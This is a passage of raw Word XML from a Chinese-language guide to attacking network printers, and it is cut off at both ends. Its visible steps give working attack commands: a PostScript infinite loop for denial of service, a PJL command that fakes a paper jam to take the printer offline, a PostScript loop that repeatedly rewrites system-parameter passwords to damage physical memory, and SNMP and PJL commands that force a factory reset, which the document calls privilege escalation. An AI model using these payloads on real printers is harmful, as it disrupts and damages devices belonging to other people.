          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">1 %! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
        <w:rPr>
          <w:rStyle w:val="hljs-selector-tag"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">2 {} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-selector-tag"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="002C0535" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="00BF52B5" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>PJL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>命令使打印机进入离线脱机状态：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PJL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> OPMSG DISPLAY=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"PAPER JAM IN ALL DOORS"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="00BF52B5" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>物理内存破坏，使用以下</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>PostScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>代码对打印机内存实现压力测试：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="002C0535" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> /counter </w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> def </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="002C0535" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> { &lt;&lt; /Password counter </w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="1F811F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> cvs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="002C0535" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> /SystemParamsPassword counter </w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> add </w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="1F811F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> cvs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="002C0535" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt; setsystemparams /counter counter </w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> add def </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic Semilight" w:eastAsia="Malgun Gothic Semilight" w:hAnsi="Malgun Gothic Semilight" w:cs="Malgun Gothic Semilight"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> } loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="00BF52B5" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="微软雅黑"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Malgun Gothic Semilight" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>提权，利用以下</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="微软雅黑"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>SNMP命令实现出厂状态重置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF52B5" w:rsidRDefault="00BF52B5" w:rsidP="002C0535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ snmpset -v1 -c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> printer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">.6.1.2.1.43.5.1.1.3.1 i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF52B5" w:rsidRDefault="00BF52B5" w:rsidP="002C0535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-meta"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B6EA1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@PJL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> DMCMD ASCIIHEX=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"040006020501010301040106"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="002C0535" w:rsidRDefault="00BF52B5" w:rsidP="002C0535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
